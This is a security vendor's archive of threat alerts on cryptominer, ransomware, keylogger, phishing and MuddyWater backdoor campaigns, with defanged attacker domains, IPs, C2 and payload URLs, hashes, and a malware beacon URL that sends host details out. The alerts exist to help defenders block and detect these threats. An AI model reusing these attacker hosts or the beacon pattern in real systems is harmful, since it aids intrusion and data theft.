Archive for category Threats

Rewterz Threat Alert – Advanced Attack Tools Target Non-patched Systems to Distribute Cryptocurrency Miners

Severity

Medium

Analysis Summary


A new cyber attack campaign targets organizations around the world to spread a cryptocurrency miner for monetary purposes. The vector of this campaign is a variant of Vools (Trojan.Win32.VOOLS.SMAL01), which is an EternalBlue-based backdoor used to deliver cryptocurrency miners and other malware.

Analysts found that all of the compromised machines were running outdated versions of Microsoft Windows OS so they were still vulnerable to already patched vulnerabilities.

Many other tools were also found in the infected systems, mainly the password dumping tool Mimikatz and Equation group tools. The final payload deployed on compromised systems is a cryptocurrency miner. Researchers also found that compromised systems appear to be on internal segments of compromised networks.

The retrieved sample seems to be an installer which sends an HTTP request to the following server:
log.boreye[.]com/ipc.html?mac={MAC address}&ip={IP address}&host={host}&tick=6min&c=error_33

Another common thing among compromised machines is that there was a file located in the main Windows folder of all the infected machines:
C:\Windows\NetworkDistribution\Diagnostics.txt. The file extension .txt is meant to avoid detection. The file actually is a ZIP archive file that contains several files (the Equation toolkit components).

All these files are variants of the open-source XMRig (Monero) miner.

The usernames used are very similar and all of them use the same password, which means the threat actor is the same. The miner always uses the name dllhostex.exe. Furthermore, the binary is always located either in the “system32” or in the “SysWOW64” folder of the infected Windows machine, depending on the miner variant.
Roughly 83% of affected computers were running Windows Server 2003 SP2. (outdated)
South Asian countries like China, India and Vietnam are among the top targets and the targeted industries include education, communication and media, banking, manufacturing, and technology.

Impact

  • Financial Loss
  • Credential Theft
  • Information Disclosure

Indicators of Compromise

URLs

  • miniast[.]com
  • tenchier[.]com
  • boreye[.]com
  • pilutce[.]com

Malware Hash (MD5/SHA1/SH256)

  • ca7db2d555e67ba1f4560e68d5bc5b09 
  • 95786b6c28bf8dba7bbfeeba9e1ec27a 
  • 6dc722c9844e61427a47a2759a8fbec0 
  • 24f18c1c0f6df20f3c3e56eea5462e00 
  • f830f3004d4637f7ad9c61719a301d18 
  • 5138bcdab5d4282aed717ad1aa6de3d4 
  • 1263f5d06fd1859a4b3924c850bbf96c 
  • 291ae5d31b83ac269e9c0bb9025ee098 
  • 9fa4dbd6bbff6e96f54039a93dae8f22 
  • 297c855681a872f80aada938f60ef33a 
  • 928e86560d1e5a4765fdb8562a265f41 
  • 740e94f902e4d364615eb10a00c3ff31 
  • 5a7de0c6a03b02da8dea170c1e8259f5 
  • 7715e7b35ccf6a2d3ad0df6baff37abd 
  • 62fa403ff17613d0c42f793a41ada4a9 
  • 50462805c6843cff49378c5c3f3b4557 
  • 5910ad6f2d82357f4a97240f77376bea 
  • 0e02555ede71bc6c724f9f924320e020 
  • f7d7778f4bc5878abb4189557d1e4472 
  • c0f1f909331dbaab57dc6345e925ee6c 
  • 81a07515af6f2663b7bcfb2eec407af7 
  • a3cc9566f6f9f23a03a87b778b6f2a6e 
  • 830cf47825cce3b24ad80d5e80113aee 
  • a013bc89f72c0c343a32adb6d6a2342e 
  • 56da116d25207847797fe5f8b085c1b1 
  • 120dafffdb96a6032ba1e22056c26738 
  • be97f6bb2c385eaaa780661381c485ec 
  • 0cf2f1207d9fd85573f6c0e7f9e7d6a9 
  • f5a7b1f998390241f5c10cbddfe88647 
  • 9f34a7aa58700746bf20dc153c61e21d 
  • c61b2dfc2a87a5d73882f1a9b0437887 
  • 5bcfdaa021a6f47283d50fbf509843e9 
  • 268f7cc5ffc830238fc55984aca4fc39 
  • 35e65bd53c04a71c487c9f2660824efc 
  • dc932f52466f4cca3e246a3016ce988e 
  • d9356b4e0df28ff65ba22f9a69f1e150 
  • c694d4999f5a99cba82638c2dfbb3a95 
  • 0dd098c63e35d68cd99d9bbc798391b5 

Remediation

  • Block the threat indicators at respective controls.
  • Keep all systems up-to-date and patched against all known vulnerabilities.

Rewterz Threat Alert – “Love You” Malspam Phishing Campaign Reemerged

Severity

Medium

Analysis Summary

A malspam email campaign that has emails with subject lines about love letters and had a zip attachment with a name starting with “Love_You_”. The zip file, when uncompressed, contained a JavaScript file that, upon execution, performed several HTTP requests to download additional malicious executables. These executables were a Monero cryptocurrency miner, Phorpiex spambot malware, and GandCrab ransomware. The Phorpiex spambot malware caused the victim host to be joined to a botnet and begin emailing out copies of the malicious zip file to additional targets. Meanwhile the victim host was infected with ransomware and leveraged to mine crypto-currency.

Impact

File encryption

Indicators of Compromise

IP(s) / Hostname(s)

  • 92[.]63[.]197[.]48
  • 198[.]105[.]244[.]228
  • 78[.]46[.]77[.]98
  • 217[.]26[.]53[.]161
  • 74[.]220[.]215[.]73
  • 136[.]243[.]13[.]215
  • 138[.]201[.]162[.]99


URLs

  • slpsrgpsrhojifdij[.]ru
  • osheoufhusheoghuesd[.]ru
  • suieiusiueiuiuushgf[.]ru
  • www[.]2mmotorsport[.]biz
  • www[.]haargenau[.]biz
  • www[.]bizziniinfissi[.]com
  • www[.]holzbock[.]biz
  • www[.]fliptray[.]biz
  • gandcrabmfe6mnef[.]onion


Malware Hash (MD5/SHA1/SH256)

  • 72429571f4ca62fceb5a4fc0a17a8f8ab88c1ed01b9d657f7e9778c7939cea06
  • 27ac0e9011294c2152d224052280f7fa434df572809a6f96f9a306f3d5c965e3
  • 99a1e83e77850b59995cdf29b61e9f29f9c38882363027668030df0a62059645
  • 06e61032bccfe0ccd51ddbab480e1eb6392bccb318639ecac0092e96b9d794ad
  • 7818e108a16f096eb71feb564ce92095c4ac1e613933630169cc16606bb5f68d
  • 0a27af16b991cbe0f5445022cb1d752a9144abeede6b8de0055247e6fd6c1698
  • 32ee086fbc82ddd0675c0293656f813493ce6d96d02e0bcbeccee4d1a6adfb20
  • 12e3038b2ed0663cba3c6a05ac0a27b61dce694dffc27aafb4cb3f2f229ff6b8
  • 6ad3e68e2e8c5088bc8544bc230a2e333645d3c246ace772bf61f80cd0e93002
  • 99fe714a365f8e4a74687592700b27f2016a59c7527b5d4ef7cfd97e63468349
  • d189f44528dfa3f8dba2632ae26f564a37931cb89668d31402fc7fb05ae63c1a
  • c3683096f91b00dfe248e388b4302d5471fb090ab8092c96c991a467c26f26b0
  • f3c369edc2ea96465c49a14f64bdce83c0a401e0ae12e809bced8f99b977c5dc
  • f4d3ba58e91dc95877ba13804df6fe307ef6efcef74d3a00792387625a624cf4
  • 9ff78056e225c08ef1f1ff71f305201387f3ec766c8727361851287a74de1f45
  • ba23af4480611fb19fad2cd83a41bd347d183e0ef8e1c5477916bebe32955d87
  • cf9a20874089ec7aa1a84a27f74928c71266a684e7fee4c1ac8d37aaf57d6bf2
  • 0de30f9dbe37aea5932e5df85b4f1aa5cefe28f3bffb58d4d8ae40ccd040a4a7
  • 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
  • 056b7eb0c06645e1f51ed77f4fa18a4bed47135108371a84f0482f141ae0d769
  • 035ae8f389e0a4cb58428d892123bc3e3b646e4387c641e664c5552228087285
  • b8bf5b607b305139db81c48e96010a67768488b01edc8c615306ed303c545b0d
  • 4b9d5841d38b8658466dcaf409c34c0f6d2d1f9ecb64254391a4621465daf79b

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.


Rewterz Threat Alert – Malspam Campaign Delivering Malicious Files Using Compromised Windstream Email Addresses

Severity

Medium

Analysis Summary

An email campaign distributing malspam. A potential victim receives an email with a subject of “Order Inquiry”. The sender was observed as “Sales hofbraurestaurant[@]windstream[.]net”. Within the body of the email, the adversary attempts to entice a user to open the attachment “Order1002 Quotation.zip” to review the order. The infection process begins once the .zip attachment is opened and the malicious content executed, ultimately leading to the Orion keylogger being installed on the victim’s system. It is important to note that it appears the email service for “windstream.net” has been compromised, allowing the threat actor to pass through authentication checks.

Indicators of Compromise

IP(s) / Hostname(s)

  • 104[.]27[.]183[.]176
  • 192[.]254[.]234[.]204

URLs

  • puu[.]sh
  • mail[.]fajr[.]com
  • http[:]//puu[.]sh/jMSLc[.]txt
  • https[:]//puu[.]sh/y0rxd[.]dll

Filename

Order1002 Quotation.zip

Email Address

hofbraurestaurant[@]windstream[.]net

Email Subject

Order Inquiry

Malware Hash (MD5/SHA1/SH256)

  • ee337babef9c414fc6bd473869a77ae7c81a0af0b62cda4b7a96abc71200e433
  • f740df4d3a6c0b378116b48c1ed18a36e82938cf7dcaaba58f0ba8101f3e3531
  • 49f3b5a15708161cb0b2d862c80e670da499675c
  • 1570b3df76464a41c9ddebbcfb5f9f93

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – Buran Ransomware

Severity

High

Analysis Summary

A new variant of the Vega ransomware which is named Buran. The ransomware is being delivered using the RIG exploit kit. Once installed on to the victim system, the ransomware is written to a file (ctfmon.exe), then executes and begins the encryption process. As is typical of ransomware, there is a list of certain directories, files and file extensions which are not to be encrypted. Files that are encrypted have the victim’s unique ID appended as the file extension and the word “Buran” prepended to the head of the file.

Impact

File encryption

Indicators of Compromise

Filename

ctfmon[.]exe

Email Address

  • polssh1@protonmail[.]com
  • polssh@protonmail[.]com

Malware Hash (MD5/SHA1/SH256)

0bed6711e6db24563a66ee99928864e8cf3f8cff0636c1efca1b14ef15941603

Remediation

Block all threat indicators at your respective controls.


Rewterz Threat Alert – DNS Compromise Attack Phishing Spam

Severity

Medium

Analysis Summary

A new finance spam campaign with HTML attachments has been discovered that utilizes Google’s public DNS resolver to retrieve JavaScript commands embedded in a domain’s TXT record. These commands will then redirect a user’s browser to a aggressive trading advertisement site, which has been reported as a scam.

All the emails were very simple emails with a HTML attachment look like this:

Scam Email

All the emails came from IP numbers that have previously been seen to be used by Necurs botnet. The domains listed in the from box do not track back to the IP numbers they came from.

The script in the file looks like:

fake invoic html file

Indicators of Compromise

URLs

  • appteslerapp[.]com
  • fetch[.]bucsgwbno[.]samaste[.]net
  • fetch[.]faonwvzso[.]ourmazdcompany[.]net
  • fetch[.]kkqhoniv[.]baranweddings[.]com
  • fetch[.]nukss[.]hrhuae[.]com
  • fetch[.]pebabsacc[.]sarahelizabethjewelry[.]com
  • fetch[.]qedrbzpzzx[.]baranevents[.]com
  • http[:]//www[.]1835bfg36abp[.]ctifsouteni[.]icu/456[.]xn--html-sw3b
  • http[:]//www[.]14534bfg36abp[.]etapportert[.]icu/5436[.]xn--html-sw3b
  • http[:]//www[.]488bfg36abp[.]ffrirbesoin[.]icu/1446[.]xn--html-sw3b
  • http[:]//www[.]5438bfg36abp[.]ffrirbesoin[.]icu/3643[.]xn--html-sw3b
  • http[:]//www[.]55696bfg36abp[.]ielassocier[.]icu/7467[.]xn--html-sw3b
  • http[:]//www[.]66688bfg36abp[.]ffrirbesoin[.]icu/3161[.]xn--html-sw3b
  • http[:]//www[.]7913bfg36abp[.]etapportert[.]icu/33476[.]xn--html-sw3b
  • http[:]//www[.]81934bfg36abp[.]etapportert[.]icu/3185[.]xn--html-sw3b
  • https[:]//appteslerapp[.]com/
  • ns1[.]firstdnshoster[.]com
  • ns[.]firstdnshoster[.]com
  • www[.]1835bfg36abp[.]ctifsouteni[.]icu
  • www[.]14534bfg36abp[.]etapportert[.]icu
  • www[.]488bfg36abp[.]ffrirbesoin[.]icu
  • www[.]5438bfg36abp[.]ffrirbesoin[.]icu
  • www[.]55696bfg36abp[.]ielassocier[.]icu
  • www[.]66688bfg36abp[.]ffrirbesoin[.]icu
  • www[.]7913bfg36abp[.]etapportert[.]icu
  • www[.]81934bfg36abp[.]etapportert[.]icu

Remediation

  • Block threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/ attachments sent by unknown senders.

Rewterz Threat Alert – New MuddyWater Activities Uncovered

Severity

High

Analysis Summary

In one of the MuddyWater campaigns, spear-phishing emails that the group sent to a university in Jordan and the Turkish government. In both cases, the threat actor group did not spoof the said legitimate entities’ sender address to deceive email recipients, but instead used compromised legitimate accounts to trick users into installing malware.

The threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3. The spear-phishing email that contains a document embedded with a malicious macro will drop a VBE file encoded with Microsoft Script Encoder. The VBE file, which holds a base64-encoded block of data containing obfuscated PowerShell script, will then execute. This block of data will be decoded and saved to the %PUBLIC% directory under various names ending with image file extensions such as .jpeg and .png. The PowerShell code will then use custom string obfuscation and lots of useless blocks of code to make it difficult to analyze.

The final backdoor code will be shown after the deobfuscation of all strings and removal of all unnecessary code. But first, the backdoor will acquire the operating system (OS) information and save the result to a log file.

This file will be uploaded later to the command and control (C&C) server. Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server. If the file is found, it will be downloaded and executed using the Powershell.exe process. The threat actor group can then proceed to a second stage attack by sending commands to a specific victim in an asynchronous way. In essence, they can download another backdoor payload from the C&C server and install it on their targets’ systems.

The group proceeded to launch a second stage attack. In this scenario, another backdoor was downloaded. The backdoor supports the following commands:

  • Take screenshots
  • Command execution via the cmd.exe binary
  • If there’s no keyword, the malware variant assumes that the input is PowerShell code and executes it via the “Invoke-Expression” cmdlet.

The C&C communication is done using PHP scripts with a hardcoded token and a set of backend functions, e.g., sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Indicators of Compromise

IP(s) / Hostname(s)

  • 103[.]13[.]67[.]4
  • 80[.]80[.]163[.]182
  • 80[.]90[.]87[.]201
  • 91[.]187[.]114[.]210
  • 78[.]129[.]139[.]131
  • 103[.]13[.]67[.]4
  • 80[.]80[.]163[.]182
  • 80[.]90[.]87[.]201
  • 91[.]187[.]114[.]210
  • 78[.]129[.]139[.]131
  • 192[.]168[.]1[.]104:54863
  • 163[.]172[.]147[.]222:4555

URLs

  • hxxp://78[.]129[.]139[.]148
  • hxxp://31[.]171[.]154[.]67
  • hxxp://79[.]106[.]224[.]203
  • hxxp://185[.]34[.]16[.]82
  • hxxp://104[.]237[.]233[.]17
  • hxxp://46[.]99[.]148[.]96
  • hxxp://134[.]19[.]215[.]3:443
  • hxxp://gladiyator[.]tk
  • hxxp://51[.]77[.]97[.]65
  • hxxp://31[.]171[.]154[.]67
  • hxxp://79[.]106[.]224[.]203
  • hxxp://185[.]14[.]248[.]26
  • hxxp://185[.]162[.]235[.]182
  • hxxp://185[.]117[.]75[.]116/tmp[.]php
  • hxxp://38[.]132[.]99[.]167/crf[.]txt
  • hxxp://185[.]244[.]149[.]218/JpeGDownload/[.]jpeg
  • hxxp://185[.]185[.]25[.]175/ref45[.]php
  • hxxp://185[.]185[.]25[.]175/sDownloads/[.]jpeg
  • hxxp://82[.]102[.]8[.]101/bcerrxy[.]php
  • amazo0n[.]serveftp[.]com/Data
  • zstoreshoping[.]ddns[.]net/Data/
  • hxxp://zstoreshoping[.]ddns[.]net/users[.]php?tname=
  • shopcloths[.]ddns[.]net
  • getgooogle[.]hopto[.]org
  • hxxp://gladiyator[.]tk
  • googleads[.]hopto[.]org
  • hxxp://www[.]shareliverpoolfc[.]co[.]uk/js/main.php
  • hxxp://valis-ti[.]cl/assets/main[.]php
  • hxxp://www[.]latvia-usa[.]org/wpincludes/customize/main.php
  • hxxp://www[.]shareliverpoolfc[.]co[.]uk/js/main[.]php
  • hxxp://valis-ti[.]cl/assets/main[.]php
  • hxxp://www[.]latvia-usa[.]org/wpincludes/customize/main[.]php
  • hxxp://googleads[.]hopto[.]org/data/ce28e899a8d3d00a.]dat
  • hxxp://ciscoupdate2019[.]gotdns[.]ch/users[.]php?
  • hxxps://www[.]jsonstore[.]io/4de4d6d84d17638b3cd0eaf18857784aff27501be7d3dd89fad2b7ac2134f52e
  • hxxps://www[.]jsonstore[.]io/ddf35a64bd5ad54f9de868a84cdb21299a33d126e307ec3a868f65372402816a
  • hxxps://104[.]237[.]233[.]38:8080/YIZDGrM_4mRn_mb8PdhL_QfL2h49aAO0wfaxRxJAdq9pH2JeliMez10IwMk6PCnluziydTlV-/
  • hxxps://104[.]237[.]255[.]212:443/GfaBcrPI14rArcGvmQT2g3sW3ZtmqL6IU0Vg5oy21aOK4gvmvYx_TCP_whhSnyQH7/
  • hxxps://104[.]237[.]233[.]38:1022/aeacrE65xE9SdVN3CJwS9gbtNM84GL_ajl_AD2EoEOHrmbpQ5qC9J7GcSSZQ0JNBDnOulnMWgNy3FV2kcHRuM0u5NMo5Jv9Ks4zS5-pLkiYs4me/
  • hxxps://104[.]237[.]233[.]38:8080/nud2WCL9WzTiAOMCuFMboA18GWsmrc8k6VqGrXXfqVghYktellhTS7_tg-D64spqdv4sOJ/
  • hxxps://88[.]99[.]17[.]148:443/3gg7DuFHLwC8gPwW3z9rgnS1Is8F83B95PHYnVpk9219KbHn25IChwxSFR35a117i2Jz_OX9mUPAYRJw3NhMBxUVDp4iMOkzt/
  • hxxps://104[.]237[.]233[.]40:8443/zi5w0iDM6aLEgcWDnumYywaHa33BIPzaylNUPUECcNCmfNNcxzv05flJoB3wvWqH6Uf01vI-1yKF96/
  • hxxps://78[.]129[.]139[.]134:8864/lZkP68TtH_BpZGhmMwxNPwy0vjimgwDRfk01pV2Xu2FztbaevB6RzBUPRietWtBcuxru7tTsF3rZGFPbepd294BP2MGd/

Malware Hash (MD5/SHA1/SH256)

  • 4d72dcd33379fe7a34f9618e692f659fa9d318ab623168cd351c18ca3a805af1
  • 7e7b6923f3e2ee919d1ea1c8f8d9a915c52392bd6f9ab515e4eb95fa42355991
  • 1dae45ea1f644c0a8e10c962d75fca1cedcfd39a88acef63869b7a5990c1c60b
  • 3deaa4072da43185d4213a38403383b7cefe92524b69ce4e7884a3ddc0903f6b
  • 36ccae4dffc70249c79cd3156de1cd238af8f7a3e47dc90a1c33476cf97a77b0
  • 9389cf41e89a51860f918f29b55e34b5643264c990fe54273ffbbf5336a35a45
  • dab2cd3ddfe29a89b3d80830c6a4950952a44b6c97a664f1e9c182318ae5f4da
  • 200c3d027b2d348b0633f8debbbab9f3efc465617727df9e3fdfa6ceac7d191b
  • 98f0f2c42f703bfbb96de87367866c3cced76d5a8812c4cbc18a2be3da382c95
  • 20bf83bf516b12d991d38fdc014add8ad5db03907a55303f02d913db261393a9
  • f5ef4a45e19da1b94c684a6c6d51b86aec622562c45d67cb5aab554f21eb9061
  • ff349c8bf770ba09d3f9830e22ab6306c022f4bc1beb193b3b2cfe044f9d617b
  • 95c650a540ed5385bd1caff45ba06ff90dc0773d744efc4c2e4b29dda102fcce
  • 6be18e3afeec482c79c9dea119d11d9c1598f59a260156ee54f12c4d914aed8f
  • 3c0c58d4b9eefea56e2f7be3f07cdb73e659b4db688bfbf9eacd96ba5ab2dfe5
  • 745b0e0793fc507d9e1ad7155beb7ac48f8a556e6ef06e43888cbefec3083f2f
  • 9580aaca2e0cd607eaf54c3eb933e41538dc10cd341d41e3daa9185b2a6341c4
  • 0ae4ce8c511a22da99c6edc4be86af1c5d3a7d2baf1e862925a503d8baae9fd7
  • c19095433ac4884d3205a59e61c90752ecb4e4fa6a84e21f49ed82d9ec48aa3c
  • 264f2ea4a8fad97e66d5ad41a57517b4645fe4c4959d55370919379b844b0750
  • 36be54812428b4967c3d25aafdc703567b42ad4536c089aefaef673ce36a958f
  • 9112505ff574b43dd27efc8afcf029841e1ea5193db90424b8b8b6b0e53c3437
  • d77d16c310cce09b872c91ca223b106f4b56572242ff5c4e756572070fac210f
  • d5b7a5ae4156676b37543a3183df497367429ae2d01ef33ebc357c4bdd9864c3
  • c63f1d364b9fa2c1023ce5a1b5fed12e1eba780c64276811c4b47743dfcbadbd
  • 0e7e3c2c7fe34afc02c6e672ae00bc4e432b300ec184dec08440fba91b664999
  • 88e02850c575504bb4476f0d519cec8e6a562b72d17ed50b9d465d8e0de50093
  • 67c3c5af27d19f25bc55c8e36ef19b57c03b211ce0637055721ae4b0e57011a7
  • 5194f84cc52093bb4978167a9f2d5c0903e9de0b81ca20f492e4fc78b6a77655
  • 3e6d39886d76ab3c08b26feae075e01e9fb3c90795fa52dd6c74e4ef8b590fe8
  • 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de
  • 5d3d5fa9c6ffa64b2af0c5ce357cb6a16085280d32eb321d679b57472ffb1019
  • 6ccb3882c516fafc54444e09f5c60738831292be0231939bec9168a0203e01bb
  • c175b2e9f0d73db293ca061ce95cdd92a423348aa162b14c158d97e9e7c3ff10
  • 66733fe27591347f6b28bc7750ba1b47b2853f711adcdb1270951c6b92e795d6
  • fbd63941a25253f5bafe69c9cc86c7effc6ff14b9adddd6f69e2f26ed39a77a4
  • 2ba871586176522fe75333e834c16025b01e1771e4c07bc13995adbfa77c45f5
  • 6a441b2303aeb38309bf2cb70f1c97213b0fa2cf7a0f0f8251fe6dc9965ada3b
  • d698c1d492332f312487e027d0665970b0462aceeeba3c91e762cff8579e7f72
  • 99e9a816e6b3fe7868b9c535ed13028f41089e0275eba1ba46ae7a62a7e47668
  • 6a441b2303aeb38309bf2cb70f1c97213b0fa2cf7a0f0f8251fe6dc9965ada3b
  • d698c1d492332f312487e027d0665970b0462aceeeba3c91e762cff8579e7f72
  • df1bd693c11893c5259c591dceef707aa0480ef5626529f8a5b0ef826e5c0dec
  • 4ba618c04cbdc47de2ab5f2c91f466bc42163fd541de80ab8b5e50f687bbb91c
  • e241b152e3f672434636c527ae0ebbd08c777f488020c98efce8b324486335c5
  • df1bd693c11893c5259c591dceef707aa0480ef5626529f8a5b0ef826e5c0dec
  • 6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b
  • 02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d
  • 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6
  • dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2
  • 26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43
  • 3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2
  • 5dbf6e347164d580665208b2bc04756857529121fd1c7861e84f18e8a6027924
  • e9617764411603ddd4e7f39603a4bdaf602e20126608b3717b1f6fcae60981f2
  • be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087
  • de4a1622b498c1cc989be1a1480a23f4c4e9cd25e729a329cfadb7594c714358
  • c2c2adecff2e517395571f4f9bee3b8cffed4521a8e1a3e3b363fd5e635f2eee
  • b2242bc51ebe2c3abc5a8691546827070540db43843b8328bdb81f450cd1254b
  • a4f9509e865d0a387cb8f0367e35ffd259b193f5270aacb67cb99942071c60cc
  • 484f78eb4a3bb69d62491fdb84f2c81b7ae131ec8452a04d6018a634e961cd6a
  • a35406d9ef82a68fbabb3c1e19911c9ed41bed335ef44a15037d1580c2b9dd12
  • efdec1ad0830359632141186917fd32809360894e8c0a28c28d3d0a71f48ec2f
  • f1a69e2041ab8ab190d029d0e061f107ef1223b553e97c302e973a3b3c80f83e
  • 31cf13e8579f0589424631c6be659480f9a204a50a54073e7d7fe6c9c81fa0db
  • 6ee79815f71e2eb4094455993472c7fb185cde484c8b5326e4754adcb1faf78e
  • 81c7787040ed5ecf21b6f80dc84bc147cec518986bf25aa933dd44c414b5f498
  • 999e4753749228a60d4d20cc5c5e27ca4275fe63e6083053a5b01b5225c8d53a
  • 8501c4df5995fd283e733ab00492f35aecb6ea2315b44e85abb90b3f067ccb64
  • 4bd93e4a9826a65ade60117f6136cb4ed0e17beae8668a7c7981d15c0bed705a
  • 503b2b01bb58fc433774e41a539ae9b06004c7557ac60e7d8a6823f5da428eb8
  • 04acd5721ad37ac5aa84e7f7e20986de0a532fb625a8bc75302a0f38c171cee3
  • 8ea17ed2cb662118937ed6fe189582cc11b2b73bb27a223d0468881ac5fcc08e
  • e2f82b074074955eeca3b0dd7b2831192bee49de329d5d4b36742c9721c8ad94
  • 503b2b01bb58fc433774e41a539ae9b06004c7557ac60e7d8a6823f5da428eb8
  • 121adcf3a52cafd0204ca4d4a42a9a09d6c9f559bcb997e51dba79c6a5a04efd
  • edde2eb39ed2f145c41e53e87d43add8de336d3e4d5c8d261f471d35edf3ed47
  • e60c802b692a503f4f91e8809bb961b5423c602f6fb374de1af4d983415de3f1
  • c84a61ba8c84ca1e879c4d8ac802ec260a8c426d89a09d8627a8c08ff6d88faf
  • 78da47f5a341909d1e6f50f8d39fdde8129ede86f04f3e88b2278e16c72e2461
  • 4e2cdfed691d6debab01c1733135b146817c94024177f9ef4b22726fac84322f
  • 3fee29fefe4aa9386a11a7a615dd052ff89e21d87eee0fff5d6f933d9384ede2
  • 3c75c2f7b299d9cc03a7ff91c568defaa39b4be02d58a75a85930ab23d2a2cff
  • 276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb
  • 818253f297fea7d8a2324ee1a233aabbaf3b0b4b9cdaa1ebd676fe00f2247388
  • f6707b5f41192353be3311fc7f48ee30465038366386b909e6cefaade70c91bc
  • de7b77f9c456d26e369263b6e1d001279b69e687b2d3029803ede21417d4f5fa
  • cc685f30e2f6039d12b4cbc92e38f1d64ba75ac12cb86afce5261a11cf4931de
  • 0faa2bb90de44ef87c7ee11165f7c702211dd603bdaea94af09cfecc3f525138
  • e6812fa0e12cc1913bfc7eb6dceb638429048e3cc59ce576c012a1d27fa20959
  • fb773f7324fdca584fff7da490820c7243a10555c8ff717d21c039a5ba337a43
  • 11761d6cf365932540ccb95b6f20aa45379736cfde33742a004fc8ceccad7daf
  • b9d4752b892759bb0cb166ab565f050f4b6385dd67f4288ff2231c69ab984a26
  • 604e09e01e2bfbc8f3680abd8005906e3fbcd2f4edaf24d80cd7105ec6f991b1
  • f2b8d7ce968ed8d6c33116bcfb8aeed97d89ec1ebf4f505c891020dc79d0ddd3
  • 336237b1ed2c99c0fef4c954490bd8282d6e46941d2ac2b6c9294a1aa9a254ed
  • 28a0131a9fda9fe2f2272c5091c77dc750da93d4a070dbd817af38723ea18f02
  • d320286e80d5785bbd14b10c00f5c9d38d9a781075d7d6ed4eb27c07d4788dbf
  • 24878dbde796c471a9d028f65421017afc087c958fb54c4b6c3cc7aeabbc1119
  • 57a9e2e6e715455827faefa982b4312b203189950fe285f1413174f5e812e408
  • 92bb4432cc9d2988ee4043e420a4df9c8caec4cd93ab258e07546781daa37086

Remediation

  • Search for these IOCs in your respective environments.
  • Block all threat indicators at your respective controls.

Copyright © Rewterz. All rights reserved.